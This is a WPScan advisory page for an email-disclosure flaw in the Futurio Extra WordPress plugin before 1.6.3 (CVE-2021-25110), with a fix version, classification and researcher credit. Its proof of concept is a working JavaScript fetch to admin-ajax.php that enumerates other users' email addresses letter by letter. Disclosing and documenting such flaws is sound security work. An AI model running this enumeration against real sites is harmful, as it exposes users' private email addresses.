WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Futurio Extra < 1.6.3 - Subscriber+ User Email Address Disclosure

Description

The plugin allows any logged in user, such as subscriber, to extract any other user's email address.

Proof of Concept

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": "@gma", "query_type": "user"}),
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

If a given user name appeared in the output list, that means, the user has "@gma" in their e-mail. Then you can extract any user's e-mail letter-by-letter.

Affects Plugins

futurio-extra
Fixed in version 1.6.3

References

CVE
CVE-2021-25110

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
b655fc21-47a1-4786-8911-d78ab823c153

Timeline

Publicly Published

2022-01-14 (about 8 months ago)

Added

2022-01-14 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin